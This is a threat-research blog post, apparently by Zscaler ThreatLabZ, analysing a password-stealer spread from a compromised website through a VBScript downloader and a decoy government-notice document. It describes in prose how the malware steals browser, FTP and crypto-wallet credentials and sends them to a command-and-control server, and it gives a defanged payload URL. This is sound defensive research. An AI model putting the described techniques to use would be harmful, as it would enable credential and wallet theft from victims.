The Zscaler ThreatLabZ team has uncovered a new password stealer malware variant being delivered through a compromised website. The payload is Microsoft Intermediate Language (MSIL) compiled and steals the passwords from victims' system, browser, and FTP software.
The payload analyzed in this blog was served from the compromised website dnoymuzik[.]com/wp-content/test/conhost[.]exe.
The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate. Activities performed by VBScript file are as follows:
- Downloads decoy document
- Terminate Microsoft Word process
- Downloads payload through a PowerShell command
- Removes the document recovery entries of Microsoft Word through registry entries
Figure 1: Screen capture of VBScript activity
Figure 2: Screen capture decoy document
The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions.
Once the malware is executed, it performs various password stealing activities, such as checking for antivirus and looking into the directories and files from which it will steal information. The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware's C&C once it grabs the sensitive information (Figure 3):
Figure 3: Checking for installed antivirus products
Figure 4: Looking at directories and files for stealing passwords and collecting information
Figure 5: Checking for strings in the system with enumeration of various files and folders and upload to the C&C
The following screen captures show different extensions that the malware targets in the victim's machine for stealing credentials:
Figure 5: Strings of extensions
Figure 6: Strings of extensions
The screen captures below show snippets of password stealing of various browsers and software before uploading to the C&C server:
Figure 7: Chrome password stealer
Figure 8: Uploading to the C&C server
Figure 9: CuteFTP password stealer
Figure 10: Electrum Bitcoin password stealer
Figure 11: Firefox password stealer
The malware steals passwords from the following software and browsers:
- Armory Wallet
- Electrum bitcoin wallet
- WinSCP Passwords
Figure 12: Network information
Below is the snapshot of stolen data from the victim's machine by the malware author
Figure 13: Stolen data
This is yet another infostealer malware that attempts to steal stored credentials from a victim's machine. The malware also contains modules to steal sensitive files such as private keys, SSH keys, bitcoin wallets, etc. ThreatLabZ will continue to monitor this malware to ensure that Zscaler customers are protected.
The Zscaler Cloud Sandbox report highlighting the indicators is shown in screenshot below:
Figure 14: Zscaler Cloud Sandbox malware report